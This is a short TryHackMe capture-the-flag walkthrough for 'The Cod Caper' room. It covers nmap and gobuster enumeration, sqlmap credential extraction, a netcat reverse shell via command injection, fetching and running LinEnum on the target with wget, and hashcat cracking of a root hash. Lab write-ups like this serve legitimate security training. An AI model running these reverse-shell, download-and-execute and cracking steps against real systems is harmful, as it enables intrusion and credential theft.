The Cod Caper -Try Hack Me (Writeup)
Check out the room
https://tryhackme.com/room/thecodcaper
Task 2:
We’ll run the nmap on the target
#nmap -sV -A -p1–1000 -T4 <machine_ip>
Task 3:
As recommended we’ll use the gobuster and link of the wordlist is given in the task
And don’t forget to use the -x flag
#gobuster dir -u <target_url> -w /path/to/wordlist -x “.extension”
Here u have to check for common extension file i.e .html , .php, .txt
Task 4 :
We’ll use the sqlmap for further exploitation
After running this command we’ll get the username and password for the admin page.
Task 5:
In the previous task we get the login page and using the sqlmap we get the username and password after successful login we’ll the screen like this.
And is a vulnerable to command execution.
Now we’ll the run the nc on our system to get the reverse shell of target machine.
Payloads are given in the link provided in the description of the task
#nc -lnvp 4444
Here my machine will listen to the target machine on the port no. 4444
Now one by one we’ll check the payload by running it on the command column on the above image
Before running the payload modify the IP add and Port
Port will be 4444
Ip add will be on the access page of the THM (Internal Virtual IP add)
Luckily I got the reverse shell on running the first perl payload on this page
https://highon.coffee/blog/reverse-shell-cheat-sheet/
Now on further enumeration, you’ll get the password in the hidden directory .
You will find the in /var/hidden/pass directory by using find command
#find -name pass -type f
Task 6:
Step1: Prepare the Script on Your Attack Machine
# mkdir linenum
# cd linenum/
LinEnum and its script can be found on GitHub
#wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
#python -m SimpleHTTPServer 4444
Step2: Download the Script on the Target Machine
Login as SSH on the target machine
#ssh pingu@<IP>
pingu@ubuntu$ cd /tmp
pingu@ubuntu$ wget <IP>:4444/LinEnum.sh
pingu@ubuntu$ ls -la
pingu@ubuntu$ chmod +x LinEnum.sh
pingu@ubuntu$ ls -la
pingu@ubuntu$ ./LinEnum.sh
Now look for the SUID files in the results.
Task 10:
Now we have the hash to crack here i have the given hash to root.txt file
We’ll use the hashcat for cracking it
# hashcat -m 1800 -a 0 root.txt /usr/share/wordlists/rockyou.txt
On completing this we’ll have the root password .
Thanks for reading